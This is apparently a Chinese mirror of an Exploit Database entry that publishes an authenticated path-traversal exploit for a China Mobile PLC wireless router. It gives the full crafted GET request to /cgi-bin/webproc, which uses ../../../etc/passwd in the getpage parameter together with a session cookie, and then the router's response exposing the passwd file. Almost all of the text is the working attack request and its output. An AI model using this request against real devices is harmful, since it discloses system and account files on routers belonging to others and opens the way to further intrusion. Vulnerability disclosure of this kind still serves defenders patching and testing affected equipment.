PLC Wireless Router GPN2.4P21-C-CN – Arbitrary File Disclosure

• Exploit Database
• 16 阅读

• 作者： Rahul Raz
  日期： 2016-08-29
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/40304/

• # Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
  # Date: 28/08/2016
  # Exploit Author: Rahul Raz
  # Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
  #Vendor: ChinaMobile
  # Tested on: Ubuntu Linux
  _____________________________________________________
  
  GET
  /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
  Host: 192.168.59.254
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101
  Firefox/48.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: sessionid=64857d81
  Connection: keep-alive
  
  Response
  HTTP/1.0 200 OK
  Connection: close
  Content-Type: text/html
  Pragma: no-cache
  Cache-Control: no-cache
  Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT;
  path=/
  
  
  #root:x:0:0:root:/root:/bin/bash
  #root:x:0:0:root:/root:/bin/sh
  #root:x:0:0:root:/root:/usr/bin/cmd
  #tw:x:504:504::/home/tw:/bin/bash
  #tw:x:504:504::/home/tw:/bin/msh